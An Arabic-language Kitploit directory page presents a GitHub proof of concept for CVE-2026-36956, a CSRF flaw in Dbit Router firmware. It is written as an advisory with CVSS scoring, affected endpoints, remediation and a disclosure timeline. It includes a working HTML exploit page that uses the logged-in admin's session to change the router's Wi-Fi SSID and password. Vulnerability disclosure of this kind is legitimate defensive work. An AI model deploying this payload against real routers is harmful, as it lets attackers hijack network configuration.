Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/kirubel-cve/cve-2026-36956
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubkirubel-cve/cve-2026-36956

CVE-2026-36956

إثبات المفهوم لـ CVE-2026-36956، وهي ثغرة CSRF في البرنامج الثابت لموجّه Dbit تسمح بتغييرات غير مصرّح بها في الإعدادات عبر طلبات مزوّرة.

عرض المستودع
2منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-36956: تزوير الطلبات عبر المواقع (CSRF) في واجهة الإدارة عبر الويب

معرف CVE: CVE-2026-36956 التاريخ: 2026-04-29 المكتشف: Kirubel Solomne البائع: Shenzhen Dibit Network Equipment Co., Ltd. المنتج: Dbit Router إصدار البرنامج الثابت: V1.0.0 CWE: CWE-352 - تزوير الطلبات عبر المواقع (CSRF)


الوصف

لا يطبّق البرنامج الثابت لجهاز التوجيه Dbit Router الإصدار V1.0.0 آليات حماية من CSRF مثل رموز مكافحة CSRF أو التحقق الصارم من رؤوس Origin/Referer على نقاط نهاية الإدارة عبر API. يمكن للمهاجم إنشاء صفحة ويب خبيثة ترسل طلبات HTTP مزورة إلى نقاط نهاية التكوين. إذا قام مسؤول مصادق بزيارة الصفحة الخبيثة، يعالج جهاز التوجيه الطلب المزور كإجراء إداري شرعي.


درجة CVSS

درجة CVSS v3.1: 8.8 (عالية) CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

المقياسالقيمة
ناقل الهجومالشبكة
تعقيد الهجوممنخفض
الامتيازات المطلوبةلا شيء
تفاعل المستخدممطلوب
تأثير السريةعالٍ
تأثير السلامةعالٍ
تأثير التوافرعالٍ

نقاط النهاية المتأثرة

نقطة النهايةالوظيفة
/api/setWlanتكوين الشبكة اللاسلكية (SSID، كلمة المرور)
/api/setWanتكوين WAN
/api/setSystemتكوين النظام

إثبات المفهوم

احفظ ما يلي باسم poc.html وافتحه بينما يكون مسؤول مسجلاً دخوله إلى جهاز التوجيه:

root@kitploit:~
<!DOCTYPE html>
<html>
<body>
<script>
  fetch('http://192.168.10.1/api/setWlan', {
    method: 'POST',
    credentials: 'include',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({
      ssid: "Hacked_Network",
      password: "attacker123"
    })
  });
</script>
</body>
</html>

السلوك المتوقع: يجب رفض الطلب بسبب عدم تطابق رمز CSRF. السلوك الفعلي: يقبل جهاز التوجيه الطلب المزور ويعالجه.


التأثير

  • تعديل غير مصرح به لـ SSID وكلمة مرور WiFi
  • تغييرات في تكوين WAN/DNS
  • رفض الخدمة للمستخدمين الشرعيين
  • السيطرة الكاملة على تكوين جهاز التوجيه

المعالجة

  • تنفيذ رموز مكافحة CSRF على جميع نقاط النهاية التي تغيّر الحالة
  • فرض التحقق الصارم من رؤوس Origin وReferer
  • استخدام سمة SameSite=Strict لملفات تعريف الارتباط الخاصة بالجلسة

الجدول الزمني للإفصاح

التاريخالحدث
2026-04-29اكتشاف الثغرة
2026-04-29الإبلاغ إلى MITRE
2026-04-29تعيين CVE-2026-36956
2026-04-29الإفصاح العام

المراجع

  • MITRE CVE-2026-36956
  • CWE-352
  • موقع البائع
تنزيل الأداة